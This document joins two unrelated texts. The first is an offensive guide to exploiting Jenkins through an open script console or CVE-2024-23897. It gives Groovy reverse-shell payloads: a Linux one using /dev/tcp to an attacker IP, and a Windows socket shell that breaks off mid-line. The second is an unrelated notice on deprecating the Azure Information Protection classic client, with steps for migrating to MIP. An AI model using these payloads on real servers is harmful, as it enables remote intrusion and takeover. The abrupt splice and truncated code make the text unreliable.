Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
Azure Information Protection (AIP) classic client and Label Management in the Azure Portal are being deprecated as of March 31, 2021
As per recent announcement from Microsoft, with label management in the Microsoft 365 compliance center now at parity with the AIP portal experience, Microsoft will sunset label management in the Azure portal as of March 31, 2021.Means, Azure Information Protection classic client and Label Management in the Azure Portal will be deprecated on March 31, 2021.
Step by step guide to transition to MIP
If you are an existing AIP customer, Microsoft recommends the following steps to transition to MIP:
- Activate unified labeling from the Azure portal and migrate labels to the Microsoft 365 compliance center to apply policies uniformly across on-premises, Microsoft 365 cloud services and more. This transition has no impact on existing AIP clients, and administrators can perform this step right away. The process takes only a few minutes, depending on the number of labels and complexity
- Copy the policies to the Microsoft 365 compliance center or create new policies there.
- Publish your labels with label policies from the Microsoft 365 compliance center
- Download the latest unified labeling client for Windows if you are not yet fully on Office 365 ProPlus
- Train end users to apply labels and protection in Office applications across web, Mac, iOS, Android and Windows.